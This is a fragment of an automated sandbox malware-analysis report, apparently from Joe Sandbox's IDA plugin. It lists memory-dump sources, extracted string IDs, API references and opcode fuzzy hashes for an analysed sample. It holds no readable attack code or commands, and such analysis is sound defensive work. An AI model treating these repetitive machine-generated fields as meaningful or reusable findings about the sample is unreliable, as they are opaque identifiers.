                                                                                                                      • API ID:
                                                                                                                      • String ID: M;R$>R$UUK
                                                                                                                      • API String ID: 0-4247670572
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: -jkhanold~m`$anold~m`$d~m`
                                                                                                                      • API String ID: 0-185452761
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: M;R$>R$UUK
                                                                                                                      • API String ID: 0-4247670572
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 8deZ$<`>f$567
                                                                                                                      • API String ID: 0-937435233
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 5$Tx+$bC
                                                                                                                      • API String ID: 0-2958649183
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID: &76#$/X$BDE:
                                                                                                                      • API String ID: 2994545307-3468712750
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 5$Tx+$bC
                                                                                                                      • API String ID: 0-2958649183
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $:$K
                                                                                                                      • API String ID: 0-296352136
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 0$8
                                                                                                                      • API String ID: 0-46163386
                                                                                                                      APIs
                                                                                                                      • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,00000000,?), ref: 0050BB95
                                                                                                                      • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,?,?), ref: 0050BC1E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: EnvironmentExpandStrings
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 237503144-0
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: !'$27
                                                                                                                      • API String ID: 0-1982139352
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: >R$UUK
                                                                                                                      • API String ID: 0-3934609353
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ji46$rYaT
                                                                                                                      • API String ID: 0-3893754386
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: =$^\
                                                                                                                      • API String ID: 0-3808277151
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 6$H
                                                                                                                      • API String ID: 0-1447585844
                                                                                                                      • Opcode ID: f29e4927c54ac98c179f3a0f292bae3631fadcfdbf98f53a81210e5407158525
                                                                                                                      • Instruction ID: b2c7f7b66298daa7f1d4773243383f6002c9e1a430cfd367fb018de4f8ec34f3
                                                                                                                      • Opcode Fuzzy Hash: f29e4927c54ac98c179f3a0f292bae3631fadcfdbf98f53a81210e5407158525
                                                                                                                      • Instruction Fuzzy Hash: CF813D716083914FE7188B29C4913ABBFE1AF92304F18986DF5D58B2D2D6B9C846CB52
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 6$H
                                                                                                                      • API String ID: 0-1447585844
                                                                                                                      • Opcode ID: 6638b2e7aec679b95dd5c4f0515b7c75de0f14e6a8597edb052b700bf6fd2e83
                                                                                                                      • Instruction ID: a7be9c9f7734b8f0f9b3619c7f9f05bc74712ee6fa3b36f2b3b05fb1c904b6dc
                                                                                                                      • Opcode Fuzzy Hash: 6638b2e7aec679b95dd5c4f0515b7c75de0f14e6a8597edb052b700bf6fd2e83
                                                                                                                      • Instruction Fuzzy Hash: 89813D716083914FE7188B39C4913ABBFE1AF92304F18D86DF5D58B2D2D6B9C846CB52
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 6$H
                                                                                                                      • API String ID: 0-1447585844
                                                                                                                      • Opcode ID: 6a3661824cb5675d82f7d5196d674bf8cdf02cadb8bde6f0f13a6e1d5230639f
                                                                                                                      • Instruction ID: 3238d1666c519aa56a8736e7469d53c4af2454e893ed236c1db35a2fc8ea447c
                                                                                                                      • Opcode Fuzzy Hash: 6a3661824cb5675d82f7d5196d674bf8cdf02cadb8bde6f0f13a6e1d5230639f
                                                                                                                      • Instruction Fuzzy Hash: D8813D716083914FE7188B29C4913ABBFE1AF92304F18986DF5D58B2D2D6B9C846CB52
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: n$n
                                                                                                                      • API String ID: 0-3874132673
                                                                                                                      • Opcode ID: 640065771ea6765fc777ed917390e0c770a06acb5a5701e8f959122f0f1be56b
                                                                                                                      • Instruction ID: 8d9ba980cc4130fb592517906380cd0f9eaa0136e79e8d24f887329dbe6b0dc6
                                                                                                                      • Opcode Fuzzy Hash: 640065771ea6765fc777ed917390e0c770a06acb5a5701e8f959122f0f1be56b
                                                                                                                      • Instruction Fuzzy Hash: 24A1F676A087908BC7249B3985813AEBBD1AFC4324F198E3EE5D9C73D1DA7888418747
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: .^Nw$QRP,
                                                                                                                      • API String ID: 0-1311683932
                                                                                                                      • Opcode ID: 06bd46f7ea8ba8e7628b94a8ec7aae6fb66e6157ae28d0d3a008e0cd43c0151c
                                                                                                                      • Instruction ID: 388d20f166fea397abfe37a3eafde6c148902660e5c675b178ca2eb5e27b15e1
                                                                                                                      • Opcode Fuzzy Hash: 06bd46f7ea8ba8e7628b94a8ec7aae6fb66e6157ae28d0d3a008e0cd43c0151c
                                                                                                                      • Instruction Fuzzy Hash: 6F71187110D3918FE3358B2488A17EBBFE2AFD7704F18596CD0CA4B281DB764846CB91
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 7$gfff
                                                                                                                      • API String ID: 0-3777064726
                                                                                                                      • Opcode ID: 56d709694afbbae2365113a58425666b43337978dd41983430c641dc0eda9218
                                                                                                                      • Instruction ID: 5135d4fa8cacf907bc7cca8faa10971a1e14b3c0ba5aff671e3dd6dd425a4c0a
                                                                                                                      • Opcode Fuzzy Hash: 56d709694afbbae2365113a58425666b43337978dd41983430c641dc0eda9218
                                                                                                                      • Instruction Fuzzy Hash: 6F6105726046158FE724CF29DC0576BB7D2EBC5314F19C62EE545CB3D2EB38980A8B85
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: XY
                                                                                                                      • API String ID: 0-554446067
                                                                                                                      • Opcode ID: b603dabb89a190568a156d8eb5b3558a09e4e3f3363efb78f7cb090296431f86
                                                                                                                      • Instruction ID: 0afdc45a47855749fa3ff6b67178035ddf52501b2165c7dac3422cb1c1d337b1
                                                                                                                      • Opcode Fuzzy Hash: b603dabb89a190568a156d8eb5b3558a09e4e3f3363efb78f7cb090296431f86
                                                                                                                      • Instruction Fuzzy Hash: 8E323136A18351CBD7149F28D9123ABBBF1FF96300F09C86DD88587291E778C989C792
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: q
                                                                                                                      • API String ID: 0-3900047139
                                                                                                                      • Opcode ID: 06d4855ebd09dee177bcacff230c5c378d8242718aa93a40a123a69a5d10ff48
                                                                                                                      • Instruction ID: c06b6bdb856d3c7b35d507e935abf9c82eeca0bac8fea77a29ce271e4897150c
                                                                                                                      • Opcode Fuzzy Hash: 06d4855ebd09dee177bcacff230c5c378d8242718aa93a40a123a69a5d10ff48
                                                                                                                      • Instruction Fuzzy Hash: FC22F1B56483018BE724CF64C8A176FBBF1FF96314F18896CE4854B791E778890ACB46
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 6
                                                                                                                      • API String ID: 0-498629140
                                                                                                                      • Opcode ID: 29062a0a7bed856864adecc04a51b955c47ac0abe8328cbd8e4662ade0057f73
                                                                                                                      • Instruction ID: bc9bdf3dd3bfe5164202980cecc97844da644d14ecb4fb3d4d0d9e28e5a5809f
                                                                                                                      • Opcode Fuzzy Hash: 29062a0a7bed856864adecc04a51b955c47ac0abe8328cbd8e4662ade0057f73
                                                                                                                      • Instruction Fuzzy Hash: 7D322DB0405B819FD351DF39C445793BFE0AB16214F188A9EE4E9CB383D236E156CBA6
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: yR
                                                                                                                      • API String ID: 0-2678679291
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
Strings
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: NP,?
                                                                                                                      • API String ID: 0-3110377521
Strings
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: "PO
                                                                                                                      • API String ID: 0-2555398857
APIs
                                                                                                                      Similarity
                                                                                                                      • API ID: FreeLibrary
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3664257935-0
APIs
                                                                                                                      Similarity
                                                                                                                      • API ID: FreeLibrary
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3664257935-0
Strings
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: .
                                                                                                                      • API String ID: 0-248832578
Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID: Y\]R
                                                                                                                      • API String ID: 2994545307-2023185185
Strings
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: <
                                                                                                                      • API String ID: 0-4251816714
Strings
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: x(m.
                                                                                                                      • API String ID: 0-3038009362
Strings
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ,
                                                                                                                      • API String ID: 0-3772416878
                                                                                                                      • Opcode ID: 4e4cdd11613485ebd3507b31ac98323400b255591d2e2a7447f694ccaad8bd43
                                                                                                                      • Instruction ID: 2df7288f85ee88a558e820e2a86df60ac5b0a40ea7f5086d2b1452b10e90c0c3
                                                                                                                      • Opcode Fuzzy Hash: 4e4cdd11613485ebd3507b31ac98323400b255591d2e2a7447f694ccaad8bd43
                                                                                                                      • Instruction Fuzzy Hash: 5AB139711083819FC325CF19C88061BFBE0AFA9704F444E6DE5D997782D635E918CB67
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: qVol
                                                                                                                      • API String ID: 0-1016533244
                                                                                                                      • Opcode ID: 8b3ced13153849996e397830bc830a781ca8cfe1ea55d45ee5fa764d7b633168
                                                                                                                      • Instruction ID: 886f5a8f72d0727b93b407e40bf60e0b2599fc64748fe1135c9bd7bc4ee1572c
                                                                                                                      • Opcode Fuzzy Hash: 8b3ced13153849996e397830bc830a781ca8cfe1ea55d45ee5fa764d7b633168
                                                                                                                      • Instruction Fuzzy Hash: 8E81C0356083158BCB24DF28E890B6ABBE2FF86354F15852CE9958B3E1E731EC55CB41
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
